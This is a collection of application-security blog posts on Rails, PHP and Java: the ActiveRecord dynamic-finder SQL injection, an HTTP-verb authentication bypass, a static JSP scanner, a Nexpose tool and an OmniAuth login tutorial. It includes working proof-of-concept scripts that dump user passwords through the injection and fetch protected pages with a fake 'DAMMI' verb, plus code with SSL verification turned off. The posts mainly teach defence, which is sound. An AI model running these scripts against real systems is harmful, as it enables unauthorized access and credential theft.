This week two vulnerabilities were found again on ActiveRecord and ActionPack Rails framework components. A Metasploit exploit was delivered out-of-the-box exploiting the latter leading to a remote command execution. Panic.

I won’t add a bit to precious Postmodern post and to the post made by metasploit hacker deeping those vulns in detail.

Just a recall to update your Rails installation to the latest available and add some code managing your inputs before using it. You will save a lot of troubles if you’re confident about an attacker can’t pass you a malformed value since you made input validation.

Java 0-day

Java is fun. There is at least a couple of security advisories per month. 2013 starts with a 0-day already spotted in the wild with a assigned CVE identifier: CVE-2013-0422.

To mitigate this you have only to disable your browser Java plugin, waiting to Oracle to patch this one.

Off by one

Don’t miss the opportunity to implement a real input validation policy for all the stuff related to your web experience. Life is too short to recover from a system compromise just because you didn’t apply some if or regex to make your data safe.

Last June we talked about a similiar vulnerability affecting ActiveRecord.

Dynamic finders

The vulnerability is in ORM resource dynamic finder methods.

Carefully crafted requests can be used to turn a dynamic finder method parameter into a query scope.

Let us suppose you have a User model with two fields: an email and a password. We also suppose that our code will take an id parameter from the outside and using it to retrieve a user from the backend.

You can retrieve a user with a given id with a call like this one:

1

  u = User.find_by_id(params[:id])

The find_by_id method is not explicity declared by the User model, it’s dynamically created by ActiveRecord as well the methods:

• find_by_email
• find_by_password

Exploiting it

If the parameter id passed to the dynamic find_by_id method, contains an Hash this is used as options to the SELECT statement instead of being part of the WHERE clause.

1
2

User.find_by_id(1) # REGULAR CALL => SELECT "users".* FROM "users" WHERE "users"."id" = 1 LIMIT 1
User.find_by_id({:select =>"* from users where id=4 --"}) # INJECTION => SELECT * from users where id=4 -- FROM "users" WHERE "users"."id" IS NULL LIMIT 1

This very trivial ruby script shows an in memory SQLite3 database managed with ActiveRecord as ORM.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34

#!/usr/bin/env ruby

require 'active_record'
require 'logger'

ActiveRecord::Base.logger = Logger.new(STDERR)

ActiveRecord::Base.establish_connection(
    :adapter => "sqlite3",
    :database  => ":memory:"
)

ActiveRecord::Schema.define do
    create_table :users do |table|
        table.column :email, :string
        table.column :password, :string
    end
end

class User < ActiveRecord::Base
end

User.create(:email=>'admin_email', :password=>'admin_pwd')
User.create(:email=>'foo_email', :password=>'foo_pwd')
User.create(:email=>'bar_email', :password=>'bar_pwd')
User.create(:email=>'vuln_email', :password=>'vuln_pwd')

puts "Using ActiveRecord #{ActiveRecord::VERSION::STRING}"
puts "Exploiting find_by_id"

100.times do  |i|
  u = User.find_by_id({:select =>"* from users where id=#{i} --"})
  puts "Password for user with id #{i} is: #{u.password}" unless u.nil?
end

The old fashioned defensive programming practice

ActiveRecord dynamic finders don’t care about the input you pass them. Of course it could be up to your application to properly sanitize the input instead of passing params directly to find_by_id method.

I rather prefer this approach since your application knows exactly the meaning of that line of code.

If you want your code to be robust against SQL Injection you must sanitize your input before moving forth.

If you need to call find_by_id, the parameter must be an integer identifier, so your approach would be explicitly casting to an Integer object.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19

sanitized_id = params[:id] # you have to consider the value tampered here

begin
  sanitized_id = sanitized_id.to_i
  # make your business logic specific choice here.
  #   * Can an id be negative?
  #   * Can an id be 0?
  #   * Have you got some particular constraint about ids? (e.g. valid ids are between 500 and 1200)
  sanitized_id = nil if sanitized_id <= 0
  sanitized_id = nil unless ( sanitized_id >= 500 and sanitized_id <= 1200)
rescue NoMethodError
  sanitized_id = nil
end

u = User.find_by_id(sanitized_id)

# Do your stuff

...

Of course this is just an example showing a security aware approach when reading a parameter that you want to manage like an Integer before using it in your ORM of choice.

Do you think adding some security checks break your agile workout? Do you think it’s just an unnecessary step adding latency to your fast and furious website?

You may want to think it twice before answering. My point of view is that for sentive parameters read from HTTP request you have to carefully handle it before passing to backend.

Off by one

On Hacker news you can find some comments about recent Github security issue exploiting Rails using this SQL Injection to override some popular Rails authentication framework.

On Phusion blog a more detailed and security aware dissertion was made in order to explain that there is of course a problem in the dynamic finder methods for ActiveRecord but exploiting it it’s a very hard task. And I agree with it.

The main problem looking at the patch is that in my opinion, it solves this problem but it doesn’t make a solid framework for input validation before building the query.

Adding your web application code to some positive filtering for the parameters you read helps you in:

• be transparent about the security model of your underlying framework
• be confident that input will fit what you expect from the user with ad hoc controls

The overhead in execution time can be, of course, an issue for impatient developers but the tradeoff between being compromised and having a couple of if statements to be executed can be a well tolerated solution.

What do you think about it? Is defensive programming a solution or just a redundant piece of code? Tell me your thoughts.

And codesake engine has a great part of it.

Disclaimer:Some of the links contained within this post have my Amazon referral ID. This provides me with a small commission for each sale. Thank you for your support.

After the failing Owasp Orizon experience I have a strong belief. A source code static analysis tool has not to do your work, instead it has to help an application security specialist in looking at the right place.

Building a full featured compiler in order to build an abstract syntax tree, inspecting the code in deep, making call backtracing and assertion over the call flow is a great programming task. My opinion on this topic is that people designing compilers are artists.

My thought is that you can’t fully automate developers’ work without falling in a pitfall and it would be more useful having something that helps a security specialist to look in the right place. It will be a human to say if in that place a security issue was found.

2 weeks of BDD workflow

Two weeks ago I started with the codesake gem that hopefully it will be also part of the application security SaaS I will launch in 2013.

The idea is simple. As an appsec guy I know which are the coding patterns that they can introduce vulnerabilities.

The tool will do the dirty grep work for you and it will be up to you to mark a suspicious unsafe pattern as a real appsec vulnerabilities.

I used the book “Build Awesome Command-Line Applications in Ruby”, by David Bryant Copeland as reference for creating a robust command line tool. I purchased this book in July and finished almost in a single deep reading evening. It will deserve a full review one of these days.

In the “Test, Test, Test” chapter I discovered aruba rubygem that adds some interesting features to cucumber dedicated in testing command line interfaces.

In 2 weeks of work during early morning commuting I wrote code thats:

• scan plain text file for reserved words. That means looking for keywords like password or fixme or todo, in order to check if text file has some interesting information or it documents some feature that has known bugs. As attacker, if you find a comment like todo: must fix this error checking routine you may want to start evaluating how to override that buggy code.
• scan jsp files for reserved keywords, variables that are written in output, reads from HTTP requests, cookies.

That it’s almost the same stuff Owasp Orizon was checking but with a more clumbered internal architecture.

codesake has engines dedicated to a particular file kind, with internal adhoc checks. They share a common interface that is the analyse method returning an array. Eventually this array contains String objects that the binary script will put on standard output. Every engine will be responsible of formatting the output.

A kernel was in place to act like multiplexer for choosing the correct engine:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39

require 'singleton'

module Codesake
  class Kernel
    include Singleton

    attr_reader   :engine

    NONE    = 0
    TEXT    = 1
    JSP     = 2
    UNKNOWN = -1

    def choose_engine(filename, options)


      engine = nil

      case detect(filename)
      when TEXT
        engine = Codesake::Engine::Text.new(filename)
      when NONE
        engine = Codesake::Engine::Generic.new(filename)
      when JSP
        engine = Codesake::Engine::Jsp.new(filename, options)
      end
      engine
    end

    def detect(filename)
      return NONE if filename.nil? or filename.empty?
      return TEXT if Codesake::Engine::Text.is_txt?(filename)
      return JSP if (File.extname(filename) == ".jsp")


      return UNKNOWN
    end
  end
end

The kernel is called by the binary script that asks it to choose the correct engine for a given target.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22

...

cli = Codesake::Cli.new
kernel = Codesake::Kernel.instance

options=cli.parse(ARGV)

...

cli.targets.each do |target|
  puts "processing #{target[:target]}" if target[:valid]
  $stderr.puts "can't find #{target[:target]}".color(:red) if ! target[:valid]

  engine = kernel.choose_engine(target[:target], options)

...

  results = engine.analyse
  results.each do |res|
    $stdout.puts "#{res}"
  end
end

Working on a new feature

Let’s say we want to introduce the scan for cookie security check in jsp engine. The need is that we want, as application security specialist, to check if cookies are used in a Jsp page in order to check if we can tamper it or even looking for secrets and sensitive informations.

We start in writing the rspec code for the functionality we want to add in order to make unit testing.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25

...

describe Codesake::Engine::Jsp do
  before(:all) do
    File.open("test.jsp", "w") do |f|
      f.write(jsp_content)
    end
    @jsp = Codesake::Engine::Jsp.new("test.jsp", {})
    @jsp.analyse
  end

  after(:all) do
    File.delete("test.jsp") if File.exists?("test.jsp")
  end

  it_behaves_like Codesake::Utils::Files
  it_behaves_like Codesake::Engine::Core

  ...

  it "analyses a jsp file for cookies" do
   expected_result = [{:line=>51, :name=>"name", :value=>"a_value", :var=>"c"}, {:line=>52, :name=>"second", :value=>"12", :var=>"cc"}]
   @jsp.cookies.should == expected_result
 end
end

Tests for Codesake::Engine::Jsp include some common ground routines for file handling and text grabbing that are included in external modules and that are checked with the it_behaves_like rspec clause. Checks for modules are so integrated in this rspec run for my Jsp engine.

We expect a cookies array contains hashes from every cookie read in a test jsp file that is in the spec file (look in the sources, I won’t include it here for simplicity).

Running the unit tests we had this feature to fail as espected. Good. Let’s move on and write our cucumber scenario for the integration test before we proceed.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

Feature: codesake process a jsp page
  When a Jsp file is given as input, codesake analyses it with the
  Codesake::Engine::Jsp engine for security issues.

  When a Jsp file is analyzed the following information will be gathered:

  * imported packages
  * variable read from requests
  * cookies created
  * reserved keywords

  ...

  Scenario: codesake processing the file finds cookies that are created by the page
    Given the jsp file "/tmp/existing.jsp" with cookies does exist
    When I successfully run `bundle exec codesake /tmp/existing.jsp`
    Then the stdout should contain "cookie \"name\" found with value: \"a_value\" (/tmp/existing.jsp@51)"
    And the stdout should contain "cookie \"second\" found with value: \"12\" (/tmp/existing.jsp@52)"

The When clause and the Then matchers are all managed by aruba gem. Pretty neat. Running also integration tests all act as expected. Our binary doesn’t know anything about cookie check output. So all red here.

We can start implementing our feature.

First we add a cookies attribute to the Codesake::Engine::Jsp class, so our unit test rspec file can stop complaining about the cookie attribute that is missing. Now rspec complains that cookies has nil value instead of the expected result.

1
2
3
4
5
6
7
8
9
10
11

module Codesake
  module Engine
    class Jsp
      include Codesake::Utils::Files
      include Codesake::Utils::Secrets
      include Codesake::Engine::Core

      ...

      attr_reader :cookies
      ...

To solve this turning the spec green, we have to implement the find_cookies routine matching with regular expressions the Java statements creating a Cookie.

This show also how this approach can fail. If the regular expression is poorly
written codesake won’t be able to detect pattern and then you may miss some
findings.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

def find_cookies
  ret = []

  @file_content.each_with_index do |l, i|
    l = l.unpack("C*").pack("U*")
    m = /Cookie (.*?) = new Cookie \("(.*?)",(.*?)\)/.match(l);
    ret << {:line => i+1, :var => m[1].trim, :name => m[2].trim.gsub("\"", ""), :value => m[3].trim.gsub("\"", "")} unless m.nil?

    m = /Cookie (.*?) = new Cookie\("(.*?)",(.*?)\)/.match(l);
    ret << {:line => i+1, :var => m[1].trim, :name => m[2].trim.gsub("\"", ""), :value => m[3].trim.gsub("\"", "")} unless m.nil?

    m = /(.*?) = new Cookie \("(.*?)",(.*?)\)/.match(l);
    ret << {:line => i+1, :var => m[1].trim, :name => m[2].trim.gsub("\"", ""), :value => m[3].trim.gsub("\"", "")} unless m.nil?

  end
  ret
end

Assign find_cookies values to cookies attribute will make our test to succeed. A regex improvement that it is underway is to skip whitespaces in some Java statement.

Running integration tests, cucumber will complain about the missing output for the binary tool. As I said before, it’s up to the engine to prepare output for binary script; I make this choice to avoid the main ruby code to deal with different results format, instead of just having a string to show.

Let’s add cookie reporting code:

1
2
3
4
5
6
7
8
9
10
11
12
13
14

def analyse
  ret =  []
  ...

  @cookies            = find_cookies

  ...
    @cookies.each do |c|
      ret << "cookie \"#{c[:name]}\" found with value: \"#{c[:value]}\" (#{@filename}@#{c[:line]})"
    end


    ret
  end

Now everything is green. We implemented our cookies scan functionality, if a JSP file will create a Cookie for us we can detect it and see if we have to be worried about it or not.

Mixing up static and dynamic

But I don’t want to implement a grep++ in ruby. The future is hybrid source code analysis and codesake (and codesake.com as well), will move further in this direction.

Soon, one or more dynamic actions will be associated to the static finding. In example, if a reflected XSS has been found in a JSP page it will be a clever approach to close test this finding making a call to that url tampering the parameter we marked as suspected.

Roadmap

Hopefully I will launch codesake.com as SaaS application security platform before summer 2013, so codesake engine that it will be one of the core engines it will reach its first major release.

codesake rubygem will always remain an opensource, MIT licensed, sast engine. Of course I’ll add more advanced functionalities in the commercial part of the codesake.com portal, mostly designed for ruby powered web applications (Sinatra, Padrino and Rails).

Some nice to have features:

• support for JAVA, Ruby and PHP
• different output formats, including SQL
• improve regular expressions
• much more better documentation

Enjoy it!

Using a malformed HTTP verb to request a protected resource, it is possible to bypass the authentication mechanism for a PHP 5.3 written web application.

The post I wrote was mentioned in Jeremiah Grossman list for the top 10 hacking technique of 2012

Original work by…

I recap that almost 3 years ago researchers found that it was possible to bypass basic auth in Zend powered portal and that this vulnerability is not Zend specific.

In order to support custom WebDAV verbs, PHP interpreter when it founds an unknown verb it gives the script the control about how to handle that method. Of course this can be mitigated in .htaccess file specifying which HTTP verbs are allowed let all other verbs to be discarded.

The attacking script

A raw ruby script implementing the technique described in my post is the following:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19

#!/usr/bin/env ruby

require 'net/http'

class Dammi < Net::HTTPRequest
  METHOD="DAMMI"
  REQUEST_HAS_BODY = false
  RESPONSE_HAS_BODY = true
end

raise "usage: dammi url page" if ARGV.length != 2

begin
  http=Net::HTTP.new(ARGV[0], 80)
  r_a = http.request(Dammi.new(ARGV[1]))
  puts r_a.body
rescue => e
  puts e.message
end

The script needs two parameters: the host and the url to be requested. There is no error checking on parameter passed from command line so you may want to add your own in order to have a pure defensive code.

1

$ ./dammi.rb localhost /protected_resource

The following line is in my webserver’s log:

1

127.0.0.1 - - [13/Dec/2012 08:14:17] "DAMMI /protected_resource HTTP/1.1" 404 40 0.0008

Off by one

The fundamental rule here is that HTTP Basic Authentication is something you want to use in your development or testing environment to protect your application before you deploy it in production.

I rather suggest you not to use HTTP Basic Authentication at all, choosing a strong authentication mechanism. Supporting OAuth is a great deal since you demand all credentials issue to a well known authentication provider (e.g. Twitter, Facebook, Github.).

Look at this post if you need to implement OAuth in a Padrino powered application using Omniauth.

As general rules, you may also want to apply:

1. Backends must be strongly protected by a login form with username and passwords
2. Passwords must not be saved in plaintext but encrypted using SHA-256 or SHA-512. Using bcrypt is even better.
3. Login forms must be served over an HTTPS connection
4. Your server side scripts must always check for authentication token in the HTTP session or wherever you choose to save it
5. Never trust users.

Enjoy it!

In those days I’m engaged on a big Java written source code review. I submitted the code onto the commercial tool we use to scan very wide codebases but, since this tool output doesn’t impress me much, I start searching the web for a Java parser I can integrate quickly in my Owasp Orizon tool.

Unsatisfied I started working on the jsp engine for sake rubygem.

When I’m reviewing the code I use this workflow. Using the commercial tool and seeing its internal parser output. Then I can focus with manual reviewing pieces of code that parser thinks they are more prone of being vulnerable.

Manual review involves using ad hoc written script, tools from my toolbox and eventually something from the opensource world. In this phase I double check code review findings submitting to a running copy of the code, some well written pattern attack in order to check if the suspected vulnerable is either a false positive or not.

Starting from the view

My tools collection lacks about a good JSP interpreter/parser. Since I’m writing codesake.com that it will be an application security portal, I firedup vim starting a quick and dirty JSP scanning engine for sake.

In a first raw implementation I used regular expression to check: * the presence of passwords or other suspected sensitive information in the code; * the packages imported by the JSP page. This can be useful to detect third party libraries used by the page; * the values read from the HTTP request * the variables reflected as output to the user

The approach I used? A lightweight TDD session with irb used instead of rspec. Remember I want to cook a rough implementation of Sake::Jsp engine. I’ll add rspec when I’ll merge it in sake gem hopefully with a better implementation.

Deep into the scanner

First of all, after the shebang, I turned on UTF-8 encoding since the source code can have Italian chars inside, I required trimmy a gem I wrote to add a trim method to ruby String just like PHP and rainbow gem to add a touch of color to the output.

1
2
3
4
5
6
7
8
9

#!/usr/bin/env ruby
# encoding: UTF-8

require 'trimmy'
require 'rainbow'

# XXX: Performance issue. @lines is looped several times in order to keep tests
# small. A clever approach could be looping the line vector only once instead
# of replicate the loops several times.

The above comment is to force myself in finding a clever implementation since all the small security checks loop in the array full of source code lines, that it brings the complexity to O(n) where n is the number of lines of code.

Another option is to loop once making all the regular expression and have some helper methods giving back a particular result.

I added a list of false positive methods that they can be found as output routine but the value they returned can’t be tampered by the user. The engine behaviour is to use another color to show them, maybe in the future they can be silently ignored.

The suspected secrets list is very prone to false positives since developers around the world can save passwords or other secrets in variables called foo, goofy, aaa, fooled or whatever. This is the main limit of source code analysis: a tool cannot understand a source code, it can only give a probabilistic evaluation. Of course, I don’t expect all people agree with this. Which is your opinion?

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

module Sake
  class Jsp

    attr_reader :lines
    attr_reader :filename

    attr_reader :results

    FALSE_POSITIVES = ["request.getContextPath()", "request.getLocalName()", "request.getLocalPort()"]
    SUSPECTED_SECRETS = ["password", "username", "login", "xxx", "todo", "fix", "fixme", "passwd"]

    def initialize(options={})
      @filename = options[:filename] unless options[:filename].nil?
      @lines = {}
      @results = {}

    end

I implemented only 2 public methods for Sake::Jsp.

sake_it will run all the tests and it is the business logic of the whole scanning engine and a Sake::Jsp.is_false_positive? that check a variable in the list of false positive values.

1
2
3
4
5
6
7
8
9
10
11

def sake_it
  @lines = read_file
  @results[:reflected]= find_reflected_vars
  @results[:import] = find_imports
  @results[:secrets] = find_secrets
  @results[:entrypoints] = find_attack_entrypoints
end

def self.is_false_positive?(var)
  FALSE_POSITIVES.include?(var)
end

The suspected secrets list is very prone to false positives since developers
around the world can save passwords or other secrets in variables called _foo_,
_goofy_, _aaa_, _fooled_ or whatever. This is the main limit of source code
analysis: a tool cannot understand a source code, it can only give a
probabilistic evaluation.

Here it starts the private implementation of the engine. read_file is not that magic. I used the readlines routine to store all the lines of code in an Array.

1
2
3
4
5

 private

    def read_file
      return File.readlines(@filename) if File.exists?(@filename)
    end

_find_secrets_ method takes a line of code, it splits it in tokens and then it loops for every returned word looking in the SUSPECTED_SECRETS Array. I wont win the Turing Price for this one but eventually it works fair for a first implementation.

1
2
3
4
5
6
7
8
9
10

def find_secrets
  ret = []
  @lines.each_with_index do |l, i|
    l = l.unpack("C*").pack("U*")
    l.split.each do |tok|
      ret << {:line=> i+1, :matcher=>tok, :line=>l} if SUSPECTED_SECRETS.include?(l.downcase)
    end
  end
  ret
end

A typical activity I do every single time I work on a source code review, is drawing a mindmap of the interconnection between classes and source code files. That map helps me in taint propagation and in detecting pieces of code that are not referenced by anyone so to be marked as unmaintained in the final report.

Finding import declaration from a Jsp page it helps me understand the packages the page uses and eventually custom Java packages developed by internal team.

1
2
3
4
5
6
7
8
9
10

def find_imports
  ret = []
  @lines.each_with_index do |l, i|
    l = l.unpack("C*").pack("U*").trim
    m = /<%@page import="(.*?)"%>/.match(l)
    ret << {:line => i+1, :package=>m[1].trim} unless m.nil?
  end

  ret
end

The _find_imports_ code can be refined in many ways. The regular expression here doesn’t match a lot of different ways the package import clause can be written. For sure a single space can lead the import not to be detected.

The find_attack_entrypoints it is more interesting. It checks all the possible read from the request. Remember that all the stuff coming from the user can be tampered ando so parameters from the HTTP request that they must be considered as possible attack entrypoints.

A clever implementation it will consider stuff read from a POST and eventually other APIs that it can be used to read data in input (File, Database, …).

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

def find_attack_entrypoints
  ret = []
  @lines.each_with_index do |l, i|
    l = l.unpack("C*").pack("U*")
    m = /request.getParameter\((.*?)\)/.match(l)
    ret << {:line => i+1, :var => m[1].trim} unless m.nil?

    m = /request.getParameterValues\((.*?)\)/.match(l)
    ret << {:line => i+1, :var => m[1].trim} unless m.nil?

    m = /request.getAttribute\((.*?)\)/.match(l)
    ret << {:line => i+1, :var => m[1].trim} unless m.nil?

  end

  ret
end

The _find_reflected_vars_ is the output scanning part of the engine. It checks all the writing the Jsp page makes as output looking for variables. Of course it doesn’t check for custom written validations, so you have to pay attention in understanding what this routine gives you as output.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

def find_reflected_vars
  ret = []
  @lines.each_with_index do |l, i|
    # <%=avar%> #=> /<%=(\w+)%>/.match(a)[1] = avar
    l = l.unpack("C*").pack("U*")
    m = /<%=(.*?)%>/.match(l)
    ret << {:line => i+1, :var=> m[1].trim} unless m.nil?

    m = /out\.println\((.*?)\)/.match(l)
    ret << {:line => i+1, :var=> m[1].trim} unless m.nil?

    m = /out\.print\((.*?)\)/.match(l)
    ret << {:line => i+1, :var=> m[1].trim} unless m.nil?

    m = /out\.write\((.*?)\)/.match(l)
    ret << {:line => i+1, :var=> m[1].trim} unless m.nil?

    m = /out\.writeln\((.*?)\)/.match(l)
    ret << {:line => i+1, :var=> m[1].trim} unless m.nil?
  end

  ret
end

Then the runtime bit it will disappear when I’ll merge the engine into sake and codesake.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22

raise "Missing filename." if ARGV[0].nil?

jsp = Sake::Jsp.new({:filename=>ARGV[0]})
jsp.sake_it

jsp.results[:import].each do |res|
  puts "Imported package: #{res[:package]}@#{res[:line]}".color(:white)
end


jsp.results[:reflected].each do |res|
  puts "Reflected variable found: #{res[:var]}@#{res[:line]}".color(:red) unless Sake::Jsp.is_false_positive?(res[:var])
  puts "User should not be able to tamper: #{res[:var]}@#{res[:line]}".color(:yellow) if Sake::Jsp.is_false_positive?(res[:var])
end

jsp.results[:secrets].each do |res|
  puts "Suspected sensitive string found: #{res[:line]}@#{res[:line]}".color(:white)
end

jsp.results[:entrypoints].each do |res|
  puts "Variable read from request: #{res[:var]}@#{res[:line]}".color(:red)
end

Off by one

Working on a source code scanning engine is really fun. You will learn a lot about the target programming language and you learn a lot in terms of hacking and source code assessment.

From the failing experience about Owasp Orizon I understood that writing a full featured source code parser is hard and eventually useless.

There are so many variables that can influence the way a developer write a piece of code that trying to understand them is a topic I leave for a sci-fi fiction like minority report.

Source code review is a particular kind of security assessment that involves creatitivy and that it requires a tool to help security specialist to understand where he/she should look instead of telling “I’m pretty sure, you will find a cross site scripting here”.

What do you think about this? Have you got different experience about source code reviews?

Don’t be shy, tell me your story

Today I want to show you something I added to a rubygem I’m working on, nexty. The idea is to give a command line alternative to some GUI tasks if you need fresh data you want to grep, plot or whatever.

Something you can’t play well with the GUI: reports

Nexpose is good and I’m pretty happy using it. However the web GUI reporting functionality doesn’t satisfy me that much.

To fulfil my goals, I created a report template with the information I need to estract and I created a scheduled report using that template to create a CSV file every month.

I observed that: * it seems report template information was lost during the time, so my scheduled report will generated with a basic default template after a successful save; * if I add a Nexpose site I have to manually add to the report information. This manual task is something annoying that it can bring to errors and so on. I need to automate the whole process.

Nexty::Report API

This time I don’t cook any raw request using API documentation. I’ll create an API on top to Nexpose native APIs.

If you look bin/nexty ruby command line utility in the nexty repository, you’ll find there is a ‘–report’ command line flag that it will generate a report from a list of Nexpose sites.

1
2
3
4
5

...
  when '--report'
    fn = Nexty::Report.generate_from_a_list_of_sites(arg, nsc)
    puts "Report saved: #{fn}".color(:white)
...

The idea is to extract all Nexpose sites, saving them in a text file and then use them to fill our report.

1
2
3
4
5
6
7
8
9

def self.generate_from_a_list_of_sites(site_list=nil, nsc)
  sites=Nexty::Sites.load_from_file(site_list)
  s = []
  sites.each do |site|
    s << nsc.find_site_by_name(site)
  end
  result = Nexty::Report.generate(nsc, s, {:template=>"my-default-template", :format=>'csv', :filename=>nil, :scan_to_include=>4})
  Nexty::Report.download(result[:url], result[:filename], nsc)
end

The Nexty::Report.generate is the routing handling all the dirty job. It creates a report using a given template (a fruther improvement it will be letting the user to specify this using a flag) loading a number of scans in the scan history for all the sites loaded from the list.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30

def self.generate(nsc, list, options={:template=>'', :filename=> '', :format=>"csv", :scan_to_include=>1})

  options[:filename] = "export_#{Time.now.strftime("%Y%m%d%H%M%s")}.csv" if options[:filename].nil? or options[:filename].empty?
  report = Nexpose::ReportConfig.new(nsc)
  report.set_name(options[:filename])
  report.set_template_id(options[:template])
  report.set_format(options[:format])

  list.each do |item|
    site_config = Nexpose::SiteConfig.new
    site_config.getSiteConfig(nsc, item[:site_id])
    scan_history = nsc.site_scan_history(item[:site_id])
    scan_history.sort! { |a,b| b[:start_time] <=> a[:start_time]}
    scan_history.take(options[:scan_to_include]).each do |scan|
      report.addFilter('scan', scan[:scan_id])
    end
  end

  report.saveReport

  url = nil
  while not url
    url = nsc.report_last(report.config_id)
    select(nil, nil, nil, 10)
  end

  full_url="https://#{nsc.host}:#{nsc.port}#{url}"

  {:url=>full_url, :filename=>options[:filename]}
end

As return value, the method prompts back the absolute URL you can grab the copy of your report using either a browser or our gem with the –download option.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

def self.download(url, filename, nsc)
  return nil if url.nil? or url.empty?
  uri = URI.parse(url)
  http = Net::HTTP.new(uri.host, uri.port)
  http.use_ssl = true
  http.verify_mode = OpenSSL::SSL::VERIFY_NONE # XXX: security issue
  headers = {'Cookie' => "nexposeCCSessionID=#{nsc.session_id}"}
  resp = http.get(uri.path, headers)

  file = File.open(filename, "w")
  file.write(resp.body)
  file.close

  filename
end

I excluded SSL certificate check so, I introduced a potentially security issue here. You may want to implement a full SSL certificate check to avoid man in the middle attacks.

Off by one

Extending a commercial tool with custom ruby code it is great. It gives me a lot of freedom in terms of automating my daily job tasks.

Nexty can be improved in a lot of ways, and I will implement the Nexpose API following their PDF documentation improving functionality and tests further more.

You’re a software craftman and you want to get the job done. Users have to register to your app and they must have the chance to login.

Attackers will hit this code first and they will try to bypass it or rather to exploit it. It’s a very critical subsystem that you have to design with care.

Don’t reinvent the wheel unless you’re forced to

Unless you do want to cook an authentication subsystem yourself, and you have some hard-to-fight constraints that force this decision, I suggest to you using a third-party opensource library implementing OAuth2 over well known identity providers like Google, Facebook, Github, OpenID.

To my taste, omniauth is one of best and easy to use ruby library implementing OAuth authentication.

Let’s see how easy is to let your users to authenticate to your applications using their github.com account.

Omniauth and Github.com integration

The followings are real code snippets from the codesake.com source code. Since I need to bind my users with their github account, using omniauth for github was the number 1 choice.

Register your application to github

Before going further, you must register your web application to github. You will get a client identifier and a secret that you must not share.

While in development it’s not a good idea to register your web application using real urls since the code will be likely running on localhost.

When I registered codesake.com, I gave localhost:3000 as base URL and /auth/github/callback as callback URL.

The callback URL is the one used by the identity provider (github in this example) to redirect user after he authorizes codesake.com to use his github.com account informations.

Specifiying the ID provider in the callback url can be a clever choice if in a future you want to add other ID providers.

Tell bundler about your choice

Now, it’s time for you to te tell bundler you will use omniauth for github gem.

1
2
3

...
gem 'omniauth-github', :git => 'git://github.com/intridea/omniauth-github.git'
...

Run bundler update now and you’re ready to tell your application the secrets it will share with github.com website.

Place this code into your main Padrino::Application, let’s say you have the default app/app.rb in your code:

1
2
3

 use OmniAuth::Builder do
    provider :github, "your client id", "your client secret"
  end

Now, you can start padrino and OAuth workflow is working out-of-the-box right now. Just point your browser to the following url: /auth/github

You will be redirect to a github.com page asking you to authorized your website to access your data. If you grant it, the call back url will be called and… an exception will be thrown unless you already created the auth controlled as described… now!

Create the auth controller

Create a controller to handle authentication:

1

$ bundle exec padrino g controller auth

Add some code in case of callback (authentication succeeded) and authentication failed.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

get :github_callback, :map => "/auth/github/callback" do

    omniauth = request.env["omniauth.auth"]

    @user = User.find_uid(omniauth["uid"])
    @user = User.new_from_omniauth(omniauth) if @user.nil?

    # save @user into your session to say he's authenticated
  end

  get :github_callback_failed, :map => "/auth/failure" do
    flash[:error] = "Error logging with github.com #{params[:message]}"

    redirect url("/")
  end

In the environement it’s placed the omniauth.auth hash object containing all github users informationss. Now it’s time to make your users informations to be persistent.

Create a user model

I use datamapper as ORM but the only differnt thing here is that the migrate command changes accordingly with the ORM you like most.

1
2

$ bundle exec padrino g model user uid:integer name:string email:string created_at:datetime update_at:datetime
$ bundle exec padrino rake dm:migrate

To my personal taste, I always default the created_at and update_at model properties to be equal to Time.now.

1
2

  property :created_at, DateTime, :default=>Time.now
  property :update_at, DateTime, :default=>Time.now

I rather enforce the presence of a valid email, also if this should be there in the user’s github account informations.

I use factory girl rubygem to mock model instances so I added some rubygems in my Gemfile for the testing environment.

1
2
3
4
5
6

gem 'rspec', :group => "test"
gem 'capybara', :group => "test"
gem 'cucumber', :group => "test"
gem 'rack-test', :require => "rack/test", :group => "test"
gem 'webmock', :group=>"test"
gem 'factory_girl', :group => "test"

FactoryGirl must be initialized in the spec_helper.rb file in order to have rspec to look for factories.

1
2
3
4
5
6
7
8
9
10
11

require 'factory_girl'

require 'webmock/rspec'

FactoryGirl.definition_file_paths = [
    File.join(Padrino.root, 'factories'),
    File.join(Padrino.root, 'test', 'factories'),
    File.join(Padrino.root, 'spec', 'factories')
]

FactoryGirl.find_definitions

And now… let’s write a trivial test for a user with empty email field that it must be not valid.

1
2
3
4
5

  it "should have an email" do
    user = FactoryGirl.create(:user)
    user.email = ""
    user.valid?.should  be_false
  end

Run our test and we should see it to fail:

1

$ bundle exec padrino rake spec:models

Add the model validation constraint and now the rspec test passes. Great.

1
2
3

...
  validates_presence_of, :email
...

Now you may want to add to your user model some helper to search users from github uid field and to create a new user if not present in your db.

1
2
3
4
5
6
7
8
9
10
11
12
13

def self.find_uid(uid)
  User.first(:uid=>uid)
end

def self.new_from_omniauth(omniauth)
  user = User.new
  user.uid = omniauth["uid"]
  user.name= omniauth["info"]["nickname"]
  user.email= omniauth["info"]["email"]

  user.save!
  user
end

Now your callback handler, when called it search for the user in the database and if not present the user is created.

Off by one

With the post I gave you some hints about using github as identity provider for your web application.

From the security point of view you:

• don’t have to care about password complexity rules, password aging, password reset issues. That means less code for you to write and less chances to introduce security issues.
• don’t have to be compliant to laws about sensitive data storage (unless your application doesn’t handle PCI, SOX or something like that data)
